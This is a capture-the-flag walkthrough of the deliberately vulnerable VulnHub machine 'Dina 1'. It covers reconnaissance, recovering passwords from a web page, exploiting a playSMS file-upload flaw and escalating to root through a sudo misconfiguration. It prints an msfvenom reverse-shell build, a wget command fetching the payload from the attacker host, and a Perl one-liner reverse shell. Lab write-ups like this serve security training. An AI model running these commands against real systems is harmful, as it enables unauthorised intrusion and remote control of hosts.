Dina: CTF walkthrough

Information

Name: Dina 1

Date of release: 10 Jul 2017

Author: Touhid Shaikh

Series: Dina

Contact: touhidshaikh22 [at] gmaill [dot] com

Website: http://www.touhidshaikh.com

VM Link: https://drive.google.com/open?id=0B1qWCgvhnTXgNUF6Rlp0c3Rlb0k

Note that the link to download the virtual system on VulnHub is not up to date. If you want to finish this CTF you have to download it from this link. Thanks for Touhid who provide me the good link after an short communication via emails.


Recognition

We can get the IP address of the VM with arp-scan:

arp-scan

Let’s scan this system with nmap:

[email protected]:~# nmap -A -O -T5 -p- --reason 192.168.1.51

Starting Nmap 7.60 ( https://nmap.org ) at 2017-10-21 06:38 CEST
Warning: 192.168.1.51 giving up on port because retransmission cap hit (2).
Nmap scan report for dina.home (192.168.1.51)
Host is up, received arp-response (0.010s latency).
Not shown: 65522 closed ports
Reason: 65522 resets
PORT      STATE    SERVICE       REASON         VERSION
80/tcp    open     http          syn-ack ttl 64 Apache httpd 2.2.22 ((Ubuntu))
| http-robots.txt: 5 disallowed entries 
|_/ange1 /angel1 /nothing /tmp /uploads
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Dina
3337/tcp  filtered directv-catlg no-response
10107/tcp filtered bctp-server   no-response
15290/tcp filtered unknown       no-response
23358/tcp filtered unknown       no-response
31816/tcp filtered unknown       no-response
33087/tcp filtered unknown       no-response
49219/tcp filtered unknown       no-response
50535/tcp filtered unknown       no-response
52909/tcp filtered unknown       no-response
55107/tcp filtered unknown       no-response
57197/tcp filtered unknown       no-response
62644/tcp filtered unknown       no-response
MAC Address: 24:0A:64:9E:6E:74 (AzureWave Technology)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.5
Network Distance: 1 hop

TRACEROUTE
HOP RTT      ADDRESS
1   10.14 ms dina.home (192.168.1.51)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 208.73 seconds
[email protected]:~#

Port 80 seems to be the only interesting service open.


Website Analyse

According to the robots.txt file we have a directory called nothing and the index of this directory contains passwords. We will use them later.

[email protected]:~# curl http://192.168.1.51/nothing/
<html>
<head><title>404 NOT FOUND</title></head>
<body>
<!--
#my secret pass
freedom
password
helloworld!
diana
iloveroot
-->
<h1>NOT FOUND</html>
<h3>go back</h3>
</body>
</html>
[email protected]:~#

We can find another interesting directory: secure, with gobuster.

[email protected]:~/Desktop# gobuster -u http://192.168.1.51/ -w /usr/share/seclists/Discovery/Web_Content/common.txt \
> -s 200,204,301,302,307,403,500 -e -m dir

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://192.168.1.51/
[+] Threads      : 10
[+] Wordlist     : /usr/share/seclists/Discovery/Web_Content/common.txt
[+] Status codes : 301,302,307,403,500,200,204
[+] Expanded     : true
=====================================================
http://192.168.1.51/.hta (Status: 403)
http://192.168.1.51/.htaccess (Status: 403)
http://192.168.1.51/.htpasswd (Status: 403)
http://192.168.1.51/cgi-bin/ (Status: 403)
http://192.168.1.51/index (Status: 200)
http://192.168.1.51/index.html (Status: 200)
http://192.168.1.51/robots (Status: 200)
http://192.168.1.51/robots.txt (Status: 200)
http://192.168.1.51/secure (Status: 301)
http://192.168.1.51/server-status (Status: 403)
http://192.168.1.51/tmp (Status: 301)
http://192.168.1.51/uploads (Status: 301)
=====================================================
[email protected]:~/Desktop#

In this directory we can download a password protected ZIP file. Fortunately for us, the previously found password can unlock this zip file.

Password: freedom

This is not a real MP3 file, just a text file with an hint for the next step.

[email protected]:~/Desktop# cat backup-cred.mp3 

I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....

uname: touhid
password: ******


url : /SecreTSMSgatwayLogin
[email protected]:~/Desktop#

We can gain access to the admin panel of the playSMS web application with these following credentials:

Username Password
touhid diana


‘sendfromfile.php’ Vulnerability

Related to this exploit (from VM author), we can execute PHP code if we change the name of the uploaded file via Burp Suite.

We generate an msfvenom Linux reverse shell.

[email protected]:~# msfvenom -p linux/x86/meterpreter/reverse_tcp LPORT=1337 LHOST=192.168.1.102 -f elf -o rshell
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 123 bytes
Final size of elf file: 207 bytes
Saved as: rshell
[email protected]:~#

Note that in order to bypass bad characters we will use base64 encoding. Here you have the commands that will be use.

[email protected]:~# echo 'wget http://192.168.1.102/rshell -O /tmp/rshell' |base64
d2dldCBodHRwOi8vMTkyLjE2OC4xLjEwMi9yc2hlbGwgLU8gL3RtcC9yc2hlbGwK
[email protected]:~# 
[email protected]:~# 
[email protected]:~# echo 'chmod 777 /tmp/rshell; ls -la /tmp/rshell' |base64
Y2htb2QgNzc3IC90bXAvcnNoZWxsOyBscyAtbGEgL3RtcC9yc2hlbGwK
[email protected]:~# 
[email protected]:~# echo '/tmp/rshell' |base64 
L3RtcC9yc2hlbGwK
[email protected]:~#

We upload our reverse shell on Dina.

Upload reverse shell

Finally, we execute our reverse shell in order to gain a low privilege shell.

Reverse shell

Low privilege shell


Privilege Escalation

Let’s see what we can do with our user.

sudo misconfiguration

Nice, we are able to execute any kind of perl code with root privileges.

We can use a one-liner Perl reverse shell command to gain a root reverse shell.

[email protected]:/var$ sudo perl -e 'use Socket;$i="192.168.1.102";$p=666;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Root shell



break

Comments